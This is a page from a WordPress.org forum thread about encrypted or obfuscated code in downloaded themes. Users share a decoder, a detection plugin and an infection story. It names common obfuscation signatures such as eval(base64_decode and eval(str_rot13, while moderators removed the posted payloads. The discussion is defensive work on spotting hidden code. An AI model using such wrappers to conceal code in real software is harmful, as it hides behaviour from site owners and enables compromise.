Kawauso - thank you so much! I'll see what I can do with that. I did actually find the "echo" instruction online and tried it, but I must have done something wrong. I pasted it into the theme editor for the appropriate page and updated the page. The code didn't appear and the page became an error. I'm glad to know that's about the footer, though it doesn't ease my concern. I love my theme, but I'm worried that it's a hacked version, and the theme's creators don't respond to queries so I can be sure. I have trouble believing that it was created by "Cheap Web Hosting." I know it's a Skinpress theme. Anyway, thanks!

Otto42 - I think what naweedshams posted is for the many people like me for whom the decoder didn't work.
Samuel Wood (Otto)
Tech Ninja
Posted 3 years ago #

mkirkwag: No, the decoder worked on his code. I tried it, worked fine. Your code was of a different type.

And if anybody can provide samples of another common encoding method, then I can easily write another decoder for that type and stick it in the first post too. The goal here is to provide decoders so that we don't have people posting tons of code all over the forums trying to get it decoded.
naweedshams
Member
Posted 3 years ago #

@Otto42 Brilliant! Thanks for your help, the decoder worked perfect!
Mr. Vibe
Member
Posted 3 years ago #

My self is a WordPress theme designer and my opinion is that if a theme is encrypted you should NOT download it. This is not GPL anymore. If you decide to thank me for my work by keeping the link, i thank you. If not, that's it...

Not all good themes are encrypted!

[links moderated]
builtBackwards
Member
Posted 3 years ago #

Please don't take this as a shameless plug, but I wrote a plugin to quickly find the obfuscated code in all of the installed themes because I often ran into this problem myself.
The plugin does not do any decoding, just identifies theme files that contain bad code.

http://wordpress.org/extend/plugins/tac/

Mods: If this is inappropriate, by all means delete it.

- builtBackwards
@mercime
Volunteer Moderator
Posted 3 years ago #

There is another kind ... eval(str_rot13(' ... '));
In one theme, I found two instances of above code in functions.php and two instances in header.php
To decode go to http://rot13-encoder-decoder.waraxe.us/ where you input the code found between the two single quotes above
elizabethrichardson
Member
Posted 3 years ago #

Thanks for the link to the decoder Otto. I have been fighting for almost 20 hours straight to remove the eval(base64_decode problem.

I'm watching this thing spread across one of my domains in particular.

Here is the first part of the problem explained http://wordpress.org/support/topic/297639/page/3?replies=67#post-1216416

Now, this might sound silly, but php files are being created in association with my theme dpb_shiny. But I can ONLY see them in my dashboard...NOT in file manager or ftp. So far it's created module.php, gdi.php, http.php and preview.php in the last hour. Ridiculous! I have no way to delete them.

I have been using this theme for almost 1 year with no problem at all and I know it didn't have any strange code attached to it as I've kept a copy of the original folder.

When I ran the contents of each file through the decoder I was only left with ?><? which seems to have helped for the moment. Am I going crazy, or are other people having weird things happen as well?

LATE EDIT

Pardon my ignorance. Just found the offending code in the flickr_feeder folder that came with the theme. Have been able to delete it through phpmyadmin but couldn't get access through FTP.

But why is it showing up now?
mkirkwag
Member
Posted 3 years ago #

I want to thank builtbackwards for the TAC plugin. It's really helpful to me to be able to stop worrying about the code, even though I wasn't able to find a decrypt script in this thread.
thaimerits
Member
Posted 3 years ago #

Thank you. greath for me.
Chukwudi Emmanuel Udegbunam
Member
Posted 3 years ago #

@Otto42: Thanks a million. http://ottodestruct.com/decoder.php did the magic.
siranthony
Member
Posted 3 years ago #

Hello Otto,
Got my hands full with this one: Any help would save some hair!

Please don't post large chunks of code here. Use http://wordpress.pastebin.com instead. Thanks! - moderator
siranthony
Member
Posted 3 years ago #

And this one found in the index:

Please don't post large chunks of code here. Use http://wordpress.pastebin.com instead. Thanks! - moderator

Thanks again!!!

12…7 Next »

Topic Closed

This topic has been closed to new replies.

WordPress.org

Forums

[closed] Encrypted Theme? Here's how to decode it. (195 posts)

Topic Closed

About this Topic

Tags

Code is Poetry